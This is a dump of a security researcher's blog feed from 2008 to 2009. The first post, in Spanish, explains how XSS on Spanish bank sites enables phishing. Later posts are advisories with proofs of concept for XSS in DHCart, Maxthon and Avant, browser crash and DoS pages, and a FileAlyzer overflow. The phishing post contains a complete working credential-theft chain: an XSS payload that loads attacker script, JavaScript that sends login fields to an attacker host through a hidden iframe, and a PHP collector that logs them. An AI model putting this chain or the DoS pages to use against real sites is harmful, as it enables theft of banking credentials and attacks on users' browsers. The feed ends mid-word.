La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-46487859309372737112009-01-06T11:48:00.007-08:002009-01-06T13:11:24.045-08:00La banca española ante el phishing##########################################<br />La banca española ante el phishing<br />##########################################<br /><br />Despues del aumento reciente de los casos de phishing sobre<br />entidades Bancarias españolas,he realizado un pequeño estudio<br />sobre el estado de esas entidades, de cara al phishing.<br /><br />Entendemos por phishing , el envio de correos fraudulentos<br />suplantando la identidad de una entidad bancaria, en el cual se<br />nos avisa de algun fallo de seguridad u otra informacion, y se<br />nos insta a visitar una url falsa de la entidad (normalmente<br />camuflan la direccion real),y una vez visitada, se nos pedira<br />seguramente , nuestras credenciales para acceder,y de hacerlo,<br />normalmente esas webs estan preparadas para capturar nuestros<br />datos de acceso.<br /><br />Todo esto esta bastante bien explicado aqui :<br /><a href="http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx" target="_blank">http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx</a><br /><br />Una vez entendido el concepto de phishing, podemos pensar,que<br />hay que ser muy tonto, para visitar una web que no es la original<br />del banco y meter , nuestras credenciales.<br /><br />Normalmente es asi , pero que ocurre si esa url desde donde se<br />lleva a cabo el ataque de phishing es realmente la original del banco?<br /><br />En una mirada asi por encima se han detectado once entidades<br />españolas tanto cajas como bancos afectados.<br /><br />Si desea saber si su entidad esta afectada, mandeme un mail<br />y gustosamente le informaremos de si esta usted en el listado<br />y de estar en el , le serian reportadas las vulnerabilidades<br />encontradas y su posible solucion o mitigacion.<br /><br />De todas maneras todas las entidades afectadas,recibiran un mail<br />avisandoles de esta situacion( a algunas ya se le ha enviado).<br /><br />Pero esto es irse por las ramas y no destapar el meollo de la<br />cuestion.. XDDDD<br /><br />Asi pues si ponemos por caso que la mayoria de web corporativas<br />de entidades bancarias y financieras son vulnerables a ataques de<br />tipo XSS o CSRF(links a la wiki), esto aumenta la posibilidad de<br />realizar ataques de phishing sobre la misma web del banco y hacer<br />asi mas creibles para los usuarios incautos el engaño.<br /><br /><br />Como puede un atacante que haya encontrado un agujero de ese<br />tipo llevar a cabo con exito ese ataque?<br /><br />Lo expuesto acontinuacion esta escrito a titulo de muestra o<br />ejemplo no me hago responsable del uso que le puedan dar <br />usuarios malintencionados.<br /><br />Esto esta mas bien expuesto como ejemplo para administradores<br />y webmasters a titulo explicativo de como un atacante puede<br />realizar este tipo de ataques sobre la misma web y hacer asi<br />mas creible el engaño.<br /> Un server (seguramente comprometido) para recojer los datos y<br /> hostear los archivos necesarios para el phishing (javascripts).<br /> Algun servidor SMTP con el relay abierto y sin autentificacion<br /> Por si queremos hacer uso de funciones de mail()<br /><br />En un banco, en la web de autentificacion , normalmente<br />encontramos un formulario en el cual se nos piden los datos<br />para poder acceder al manejo de cuentas y demas.<br /><br />Un ejemplo de formulario podria ser similar a este:<br /><br />====================<br /><!--Ejemplo login.php --><br />====================<br /> [..]<br /> <form method="POST" action="login.php" name="loginusuarios"><br /> User: <input type="text" name="usuari"><br /><br /> Pass: <input type="password" name="pass"><br /><br /> <input type="submit" name="submit" value="Login"><br /> </form><br /> [..]<br /> <!-- EOF --><br /><br />si observamos el codigo vemos varios elementos:<br /><br /> - Hay un formulario de acceso llamado "loginusuarios"<br /> - El usuario de texto será "loginusuarios.usuari"<br /> - El paso de texto será "loginusuarios.pass"<br /><br />Por lo tanto,podriamos crear un java a medida para el sitio<br />para que añadiera un iframe oculto al cuerpo del documento por<br />medio de xss y obtener asi los datos introducidos.<br /><br /><br />Un ejemplo podria ser este:<br /><br /><br /><br />http://[Entidad_victima]/login.php?variable_vulnerable=<br />"><script src="http://[Attacker]/phishing.js"></script><br /><br />o en alguna de sus codificaciones para disimularlo aun mas:<br /><br />http://[Entidad Victima]/login.php?variable_vulnerable=%22%3E<br />%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%<br />5B%41%74%74%61%63%6B%65%72%5D%2F%70%68%69%73%68%69%6E%67%2E%<br /><br />6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E<br /></p><br /><br />El javascript, se ejecutaria en el contexto de seguridad entre<br />el server, y el navegador del usuario lejitimo de la web.<br /><br />====================<br />/* phishing.js */<br />=================== <br /><br /> //Ponemos el nombre del formulario<br /> Form = document.forms["loginusuarios"];<br /> <br /><br /> function OcultarLogin() {<br /> // Creamos un nuevo iframe.<br /> var iframe = document.createElement("iframe");<br /><br /> // Forzamos al iframe a que este escondido<br /> iframe.style.display = "none";<br /><br /> // Cargamos el codigo malicioso en el iframe.<br /> iframe.src = "http://[atacante]/pilla_login.php?user="<br /> + Form.usuari.value + "&pass=" + Form.pass.value;<br /><br /> // Añadimos el iframe en el cuerpo del documento<br /> document.body.appendChild(iframe);<br /> }<br /> // Cuando el usuario clica en enviar, se nos envia esa inf.<br /> Form.onsubmit = OcultarLogin();<br /><br /> /* EOF */<br />==========================<br /><br />Despues necesitamos que esos datos sean recojidos, y para<br />ello necesitaremos un server donde llevar los POST y un <br />archivo hosteado preparado para recibirlos y guardarlos o<br />enviarlos por mail ,como queramos.<br /><br />====================<br />/* pilla_login.php */<br />====================<br /><br /> <br /> if(isset($_GET['user']) && isset($_GET['pass'])) {<br /> // Establece el path y abre el archivo logins.txt<br /> $file_path = "logins.txt";<br /> $file = @fopen($file_path, "a");<br /> // genera la cadena<br /> $string = "User: ". $_GET['user'] ." and Pass: ". $_GET['pass'] . "\n";<br /> // Escribe la cadena y cierra el archivo.<br /> @fwrite($file, $string);<br /> @fclose($file);<br /> }<br /><br /> // si ademas queremos enviar los datos capturados por mail =><br />// mail("atacante@atacante.es","Otro Pardillo pico","$string"); <br />?><br /> /* EOF */<br />=================================<br /><br />Con lo cual un agujero bien simple como puede ser un<br />XSS puede convertirse en un ataque sofisticado para<br />realizar un phishing directo a una entidad Bancaria.<br /><br />Aun podriamos rizar mas el rizo:<br /><br />Suponiendo que el usuario victima ,no visite la web, o que<br />cliquee en otro lado y vaya a otra pagina diferente de donde<br />se encuentra el formulario de login,podriamos "forzarlo" a <br />ir a la pagina delogin primero,y antes de que realice ninguna<br />accion, deba introducir primero los datos de login , para <br />poder acceder.<br /><br />Esto seria tambien aun mas creible ya que estariamos efectuando<br />el phishing directamente desde la web de la entidad y ademas <br />obligamos al user a hacer login con su propio formulario<br />de login.<br /><br />Si modificamos el javascript anterior para que haga lo mismo;<br />pero que ademas fuerce al usuario,creariamos un segundo iframe.<br />en un iframe cargaremos el codigo malicioso , y en el otro<br />cargariamos el formulario de login de la web:<br /><br />=================================<br />/* phishing2.js */<br /><br /> Form = document.forms["loginusuarios"];<br /> function forzarLogin() {<br /> var loginiframe = document.createElement("iframe");<br /> var loginiframe.src = "http://[Entidad-victima]/login.php";<br /> document.body.appendChild(loginiframe);<br /> }<br /> function OcultarLogin() {<br /> var iframe = document.createElement("iframe");<br /> iframe.style.display = "none";<br /> iframe.src = "http://[Atacante]/pilla_login.php?user="<br /> + Form.usuari.value + "&pass=" + Form.pass.value;<br /> document.body.appendChild(iframe);<br /> }<br /> window.onload = forzarLogin();<br /> Form.onsubmit = OcultarLogin();<br /><br /> /* EOF */<br />====================================<br /><br />Aunque todo lo aqui expuesto es un burdo ejemplo,creo que<br />queda bien reflejado el alcance y que el resultado, es obvio,<br />aunque en muchos contratos de banca online , se "firma" que <br />el usuario no hara un mal uso de las credenciales suministradas<br />...etc.<br /><br />Ante un ataque real de phishing...el usuario victima,ni se<br />habra enterado de lo que ha pasado , ya que en si ha sido <br />el el que legalmente ha introducido sus credenciales en la <br />web de la entidad y ha sido desde la web misma de la entidad<br />desde donde han sido robadas esas claves.<br /><br />Seguramente los webmasters y programadores de los sitios web<br />de estas caracteristicas, deberian fijarse mas en este tipo <br />de agujeros a los cuales no se les da mucha importancia.<br /><br />Muchas veces , Contratan servicios o sistemas ya prediseñados<br />como pueden ser alguno de los portales de oracle o algun tipo<br />de CMS como Vignette CMS;Pero ¿No son resposables los equipos<br />de seguridad logica que poseen las entidades o que subcontratan?<br />No deberian esos equipos estar al dia en vulnerabilidades sobre<br />sus sistemas??<br /><br />La primera medida para poder luchar contra la plaga que <br />es el phishing deberia ser mantener nuestros sitios libres<br />de agujeros o al menos revisarlos y no sacar al mercado , <br />nada que no haya sido antees testeado a fondo, Pues es <br />nuestro dinero con el que en se juega.<br /><br />Despues de este estudio, dire, que me he quedado muy <br />decepcionado de lo que es la banca online española, <br />actualmente, son bastantes las entidades que podrian<br />estar afectadas.<br /><br />Los usuarios podrian prevenir estas situaciones usando por<br />ejemplo Internet explorer 8 que lleva un filtro antiXSS, <br />aunque personalmente me fio mas de la barra de netcraft, <br />ademas de que puede ser usada en explorer y en firefox<br /> <a href="http://toolbar.netcraft.com/" target="_blank">http://toolbar.netcraft.com/</a><br /><br />###############################<br />Enlaces Relacionados y fuentes:<br />###############################<br /><br /><a href="http://www.siliconnews.es/es/news/2008/09/22/bancos_espanoles_victimas_5_phishing_mundial" target="_blank">http://www.siliconnews.es/es/news/2008/09/22/bancos_espanoles_victimas_5_phishing_mundial</a><br /><a href="http://www.antiphishing.org/" target="_blank">http://www.antiphishing.org</a><br /><a href="http://www.playhack.net/papers/" target="_blank">http://www.playhack.net/papers/</a><br /><a href="http://www.microsoft.com/spain/empresas/legal/phishing.mspx" target="_blank">http://www.microsoft.com/spain/empresas/legal/phishing.mspx</a><br /><a href="http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx" target="_blank">http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx</a><br /><a href="http://seguridad.internautas.org/html/4428.html" target="_blank">http://seguridad.internautas.org/html/4428.html</a><br /><br />--<br /><br />atentamente:<br />Lostmon (Lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group:http://groups.google.com/group/lostmon (new)<br />--<br /><br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-39482065307931585322008-11-10T10:53:00.002-08:002008-11-10T11:06:11.124-08:00CaixaPenedes Parchea su Banca Online#######################################<br />CaixaPenedes Pachea su Banca Online<br />vendor: http://www.caixapenedes.com<br />Articulo original:http://lostmon.blogspot.com/<br />2008/11/caixapenedes-pachea-su-banca-online.html<br />#######################################<br /><br />La web de Caixapenedes bajo sus diferentes dominios,<br />se vio afectada por una serie de errores de saludación<br />de tipo Cross-site scripting.<br /><br />Las vulnerabilidades fueron reportadas en dos fases:<br /><br />En la primera se reporto, lo que se considero mas grave,<br />que en si era la posibilidad de poder realizar transacciones<br />como transferencias, sin necesidad de la tarjeta llave,<br />aun sin estar activada esta,el bug también funcionaba.<br /><br />Esta vulnerabilidad fue descubierta por FalconDeOro y estudiada<br />por el y por mi hasta descubrir el como y donde funcionaba.<br /><br />En la segunda fase fueron localizadas por mi unas veinte <br />vulnerabilidades o vectores de ataque, en la parte externa<br />de la web;es decir en la parte no autentificada de la web;<br />pero bajo el protocolo seguro https.<br /><br />Las vulnerabilidades eran de tipo Cross-Site Scripting (XSS).<br />Dichos agujeros ,fueron reportados al equipo de seguridad logica<br />de caixapenedes, y al servicio de atencion al cliente, <br />telefonicamente y vía email ,respectivamente.<br /><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/caixapenedes.jpg" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/caixapenedes.jpg" height="250" width="400"></center></a><br /><br />-- <br /><br />Descubiertas en julio del 2008<br />contacto inicial el 13 agosto del 2008<br />Pacheo completo aproximado el 20 de septiembre del 2008<br />hecho publico el 10 de noviembre del 2008<br /><br />el primer bug no puedo decir exactamente cuando fue descubierto y <br />cuando fue reportado , pues todo fue telefonicamente y no tengo ninguna<br />fecha de referencia , pero si que es anterior a los segundos<br />Y que una convención de ambos podría haber sido aprovechada<br />por los Phishers, aunque durante el periodo de tiempo , <br />que pudieron durar estas ediciones de seguridad ningún usuario/cliente<br />pudo verse afectado ya que todo fue reportado con la mayor discreción<br />posible,por ambas partes.<br /><br />No se da ninguna prueba de cocepto por motivos evidentes.<br /><br />Aun queda un agujero XSS pero creo que con casi tres meses de tiempo<br />debía haber sido tiempo suficiente para ser parcheado.<br /><br />########################### €nd ################################<br /><br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-21543479711880296522008-11-04T14:25:00.004-08:002009-03-28T03:10:48.539-07:00DHCart Multiple variable XSS and stored XSS###########################################<br />DHCart Multiple variable XSS and stored XSS<br />Vendor URL:http://www.dhcart.com/ <br />Advisore:http://lostmon.blogspot.com/<br />2008/11/dhcart-multiple-variable-xss-and-stored.html<br />vendor notify:YES Exploit:YES Patch:YES<br />###########################################<br /><br />DHCart is a PHP based application that provides a simple<br />to use shopping cart for users purchasing domain names<br />and hosting services.<br /><br />DHCart is prove vulnerable to Cross site scripting and <br />stored cross-site scripting.<br /><br />################<br />Solution<br />###############<br /><br />The vendor has reported that latest version of<br />DHCart is 3.86 and there is no any security bug<br />after v3.85.<br /><br />#############<br />see this PoC<br /><br />http://Victim/order.php?dhaction=check&submit_domain=<br />Register&domain=%22%3E%3Cscript%3Ealert%28%29%3C%2F<br />script%3E&ext1=on<br /><br />or<br /><br />http://Victim/order.php?dhaction=add&d1=lalalalasss<br />%22%3E%3Cscript%3Ealert(1)%3C/script%3E&x1=.com&r1=<br />0&h1=1&addtocart1=on&n=3<br /><br />in this case the xss is exploitable via url , and it's stored<br />in the cart, wen the users goes to look his cart the xss<br />is executed again (stored XSS)<br /><br />Vulnerable code:<br /><br />arround line 93 in config.php file we found:<br /><br />if (!empty($HTTP_GET_VARS)) while(list($name, $value) = each($HTTP_GET_VARS)) $$name = $value;<br /><br />this is vulnerable because $value is returned to the users without sanitize.<br /><br />i have fully pached ... add a function to filter variables and apply this filter to $value variable.<br /><br /><br />///////////////////////////////////////////////////////////////////////////<br />// Code below this point should not need modifying. Do so at your own risk! <br />///////////////////////////////////////////////////////////////////////////<br /> function StopXSS($text)<br /> {<br /> if(!is_array($text))<br /> {<br /> $text = preg_replace("/\(\)/si", "", $text);<br /> $text = strip_tags($text);<br /> $text = str_replace(array("'","\"",">","<","\\"), "", $text);<br /> }<br /> else<br /> {<br /> foreach($text as $k=>$t)<br /> {<br /> $t = preg_replace("/\(\)/si", "", $t);<br /> $t = strip_tags($t);<br /> $t = str_replace(array("'","\"",">","<","\\"), "", $t);<br /> $text[$k] = $t;<br /> }<br /> }<br /> return $text;<br /> }<br /><br />if (!empty($HTTP_GET_VARS)) while(list($name, $value) = each($HTTP_GET_VARS)) $$name = StopXSS($value);<br /><br />######################€nd##################<br />--<br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br />Thnx To Climbo<br /><br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br /><br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-5541952848029060622008-11-02T08:32:00.021-08:002008-11-02T09:45:27.880-08:00Multiple Browsers Stack overflow in javascript with infinite array##################################################<br />Multiple Browsers Stack overflow in javascript with infinite array<br />##################################################<br /> ############<br /> Description<br /> ############<br /><br />Multiple Browsers are prone vulnerables to a stack overflow<br />or crash via infinite array in Javascript engine.<br />This is a extended research from this vulnerability/exploit :<br />http://www.securityfocus.com/bid/31703<br /><br />This issue can use for example in a web post vulnerable to xss<br />Style attacks or similar to do a DoS from web to Web browsers victim´s.<br /><br />################<br />Browsers Tested:<br />################<br /><br />Fail = affected<br />pass = Not affected ¿?<br /><br />#####################<br /> Testing<br />#####################<br /><b>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</b><br />Here You have two variants of this array sav this file:<br />#####################################<br /><html><br /> <head><br /> <title>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</title><br /> <script type="text/javascript"><br /> function infinite_array()<br /> {<br /> foo = new Array();<br /> alert('infinite array');<br /> while(true) {foo = new Array(foo);}<br /> }<br /> function infinite_array2()<br /> {<br /> foo = new Array();<br /> alert('Infinite array with sort()');<br /> while(true) {foo = new Array(foo).sort();}<br /> }<br /> </script><br /> </head><br /> <body><br /><h3>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</h3><br /><input type="button" value="Infinite array Without sort()" onclick="infinite_array();" /><br /><input type="button" value="Infinite array with sort()" onclick="infinite_array2();" /><br /></body></html><br />####################################<br /> <a href="http://usuarios.lycos.es/reyfuss/xss/images/tabla.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/tabla.GIF"></center></a><br />###############<br />Stack Overflow<br />###############<br /><br />IE7 , Avant Browser and Maxthor browsers this cause a stack<br />overflow in javascript.<br /><br />In ie7 i try to trace and exploit it with olly debugger , <br />but all cases what i test to turn it executable , are all<br />time go to SEH. This is not exploitable , and the browsers<br />wen click in the alert can continue working without problems;<br />them this is a recoverable issue.Microsoft security team has<br />determine that this issue at this moment is not exploitable.<br /><br />In Google Chrome can cause a tab Crash or if we only have<br />open one window and one tab, open the exploit, and don´t wait,<br />try to navigate to google or other site causes that google <br />Chrome close without warning , error, or alert, if we have <br />open multiple tabs, this issue only crash/close the tab<br />affected by the exploit. If open the exploit and wait few<br />seconds Chrome show a warning to close the crashed tab.<br /><br /><br />################<br /> Memory abuse<br />################<br /><br />In ie7 can cause a memory abuse and can turn unestable all<br />system and all aplications.(it can load all memory)<br /><br />In safari for windows can cause a program termination, safari<br />closes all windows, all tabs without a alert or a warning or<br />error.With olly , can trace , and it´s too a stack overflow.<br /><br />In Google Chrome can cause a tab Crash or if we only have open<br />one window and one tab, open the exploit, and don´t wait, try <br />to navigate to google or other site causes that google Chrome<br />close without warning , error, or alert if open the exploit<br />and wait few seconds Chrome show a warning to close the <br />crashed tab.<br /><br />Some other browsers detects the slow scripts and ask for stop.<br />In opera , it abuse memory , but we can recover it or navigate<br />to other sites them this is a recoverable issue.<br /> <br />#######################€nd#####################<br /><br />Thnx to Microsoft security team for support & interesting.<br />Thnx to Apple security team for support & interesting.<br />--<br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com</p><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br /><br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-52228816193600084332008-09-29T12:13:00.002-07:002008-09-29T12:29:33.296-07:00Safari for widnows and Google Chrome Window.open and alert DoS#####################################<br />Safari for windows and Google Chrome<br /> Window.open & alert DoS<br />#####################################<br /><br />Reported Here => http://code.google.com/p/chromium/issues/detail?id=2966<br /><br />Product Version : 0.2.149.30 (2200)<br />URLs (if applicable) :<br />Other browsers tested:<br />Add OK or FAIL after other browsers where you have tested this issue:<br /> Safari 3: FAIL<br /> Firefox 3: OK<br /> IE 7: OK<br /><br />What steps will reproduce the problem?<br />1. Open a Malicious page with evil script code<br /><br />What is the expected result?<br />Chrome open one window and show one alert.<br /><br /><br />What happens instead?<br />Chrome open all time a new window wen the users click in OK<br />from alert...<br /><br />Please provide any additional information below. Attach a screenshot if <br />possible.<br /><br />##########################<br />Evil Page with Javascript <br />##########################<br /><html><br /><head></head><br /><title> Chrome Window.open & alert DoS</title><br /><body><br /><script><br />DMK = window.open(location.reload('http://lostmon.blogspot.com'));<br />DMK.alert(DMK)<br /></script><br /></body><br /></html><br /><br /><br />##################€nd##############<br />--<br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-44439371716320320212008-09-28T12:08:00.002-07:002008-09-28T12:23:41.850-07:00Filealyzer 1.6.0.4 Stak overflow#################################<br />Filealyzer 1.6.0.4 Stak overflow<br />Vendor url:http://www.safer-networking.org/<br />Advisore:http://lostmon.blogspot.com/<br />2008/09/filealyzer-1604-stak-overflow.html<br />Vendor notify:yes exploit:PRIVATE<br />###############################<br /><br /><br />#############################<br />Overview By vendor<br />#############################<br /><br />http://www.safer-networking.org/en/filealyzer/index.html<br /><br />FileAlyzer is a tool to analyze files - the name itself<br />was initially just a typo of FileAnalyzer, but after a <br />few days I decided to keep it. FileAlyzer allows a basic<br />analysis of files (showing file properties and file contents<br />in hex dump form) and is able to interpret common file <br />contents like resources structures (like text, graphics,<br />HTML, media and PE).<br /><br />Using FileAlyzer is as simple as viewing the regular properties<br />of a file - just right-click the file you want to analyze and<br />choose Open in FileAlyzer.<br /><br />###################<br />Description of bug<br />###################<br /><br />http://forums.spybot.info/showthread.php?t=34737<br /><br />Filealyzer is prone vulnerable to a stack overflow<br />wen parsing a malformed exe file with a malformed<br />version information.<br /><br />The asm code reveals that the application fails <br />in a instruction wen try to move EAX register value<br />to EAX register again.<br /><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/filealyzer_crash.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/filealyzer_crash.GIF" height="250" width="400"></center></a><br /><br /><br />#######################<br />Signature for identify<br />#######################<br /><br />This information Is of ID´s Systems<br />or antivirus or antispyware software<br />to easy detect.<br /><br />filesize=327168<br />timestamp[file]=2008-08-26 14:24:23<br />md5=B84ADA93FAEB728F024687A6127B5AAB<br />crc32=4629A2C8<br />exists[authx509]=0<br /><br />######################<br />Solution<br />###################<br /><br />No sulution at this time !!!<br /><br />##############<br />Time Line<br />##############<br /><br />Discovered:02-07-2008<br />Vendor notify:28-09-2008<br />Disclosure:28-09-2008<br /><br />##################€nd##############<br />--<br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-87475244956585107542008-09-20T04:45:00.004-07:002008-10-18T02:08:17.929-07:00Google Chrome Fatal Crash##########################<br />Google Chrome Fatal Crash<br />##########################<br /><br />Product Version : 0.2.149.30 (2200)and 0.2.149.29<br />URLs (if applicable) :it´s indiferent.<br />Other browsers tested:<br /><br /> Safari 3: ok<br /> Firefox 3: ok<br /> IE 7: ok<br />With other browsers i can only saturate the browser.<br /><br />What steps will reproduce the problem?<br />1. open a malformed web<br />2. close the tab window<br />3. close again the same tab window<br /><br />What is the expected result?<br /><br />the expected result is that Chrome close the tab and we can´t close again <br />the tab<br /> <br />What happens instead?<br /><br />Chrome do a Fatal Crash :)<br /><br />sing of error:<br /><br />AppName: chrome.exe AppVer: 0.0.0.0 ModName: chrome.dll<br />13:22 ? Lostmon ¦ ModVer: 0.2.149.30 Offset: 00007b1c<br /><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/Chrome.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/Chrome.GIF" height="250" width="400"></center></a><br /><br />After a several test i can reproduce it all time <br />the function source file and function involved in crash:<br /><br /> tab_strip_model.cc<br /><br />http://src.chromium.org/viewvc/chrome/trunk/src/chrome/browser/tabs/tab_str<br />ip_model.cc?view=markup&pathrev=83<br /><br />and the function part in the file affected is in line 561:<br /><br />TabContents* TabStripModel::GetContentsAt(int index) const {<br />CHECK(ContainsIndex(index)) <<<br />"Failed to find: " << index << " in: " << count() << " entries.";<br />return contents_data_.at(index)->contents;<br />}<br /><br />reported here:<br />http://code.google.com/p/chromium/issues/detail?id=2579<br /><br />--<br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente.... <br /><br />Thnx for your time !!!<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-13223583080351448022008-09-05T14:10:00.002-07:002008-09-05T14:15:20.991-07:00Maxthon Browser URI about: Dialog XSS##########################################<br />Maxthon Browser URI about: Dialog XSS.<br />Vendor URL: http://www.maxthon.com/<br />Advisore:http://lostmon.blogspot.com/2008/09/<br />avant-browser-uri-about-dialog-xss_05.html<br />Vendor notify:yes exploit available:yes<br />##########################################<br /><br />##########################<br />Vulnerability description<br />##########################<br /><br />Maxthon Browser contains a flaw that allows a remote<br />cross site scripting attack.This flaw exists because<br />the application does not validate In the URI dialog<br />'about:' This could allow a user to create a specially<br />crafted URL that would execute arbitrary code in a user's<br />browser within the trust relationship between the browser<br />and the server,leading loss ofintegrity.<br /><br />#################<br />Versions<br />################·<br /><br />Maxthon Browser 1.6.4 built 20 Vulnerable<br /><br />Maxthon Browser 2.0.2.2961 Not vulnerable<br /><br />Aparently in changelog of this version (2.0.2.2961)<br />The vendor has change some parts of about dialog ,them, <br />this vulnerability its pached after this version; but <br />before, prior versions can be vulnerables too.<br /><br /><br />ChangeLog from Maxthon:<br />http://www.maxthon.com/changelog.htm<br /><br /><br /><br />###################<br />Solution<br />###################<br /><br />Update to version 2.0.2.2961 or latest built.<br /><br /><br /><br />###################<br />Timeline<br />##################<br /><br />Dicovered:16-08-2008<br />vendor notify:05-09-2008<br />Vendor response:---<br />Public Disclosure:----<br /><br />###################<br />Proof of Concept.<br />###################<br /><br />#############<br />Test<br />#############<br /><br />Put in your Maxthon Broser<br /><br />about:"><script>alert(1)</script><br /><br />or create a link like <br /><br /><a href='about:<a href='about:"><script>alert(1)</script>'>Maxthon Browser XSS</a><br /><br />############## €nd ###################<br /><br />Thnx To estrella to be my light<br />Thnx to all Lostmon Team !<br />thnx to imydes From www.imydes.com<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-35793259191015511322008-09-05T14:05:00.001-07:002008-09-05T14:09:58.190-07:00Avant Browser URI about: Dialog XSS##########################################<br />Avant Browser URI about: Dialog XSS.<br />Vendor URL: http://www.avantbrowser.com/<br />Advisory:http://lostmon.blogspot.com/2008/09/<br />avant-browser-uri-about-dialog-xss.html<br />Vendor notify:Yes exploit available:yes<br />##########################################<br /><br />##########################<br />Vulnerability description<br />##########################<br /><br />Avant Browser contains a flaw that allows a remote<br />cross site scripting attack.This flaw exists because<br />the application does not validate In the URI dialog<br />'about:' This could allow a user to create a specially<br />crafted URL that would execute arbitrary code in a user's<br />browser within the trust relationship between the browser<br />and the server,leading loss of integrity.<br /><br />#################<br />Versions<br />################·<br /><br />Avant Browser 11.6 built 20 vulnerable.<br /><br />Avant Browser 11.6 built 7 vulnerable<br /><br /><br />###################<br />Solution<br />###################<br /><br />No Solution at this time !!!<br /><br /><br /><br />###################<br />Timeline<br />##################<br /><br />Discovered:16-08-2008<br />vendor 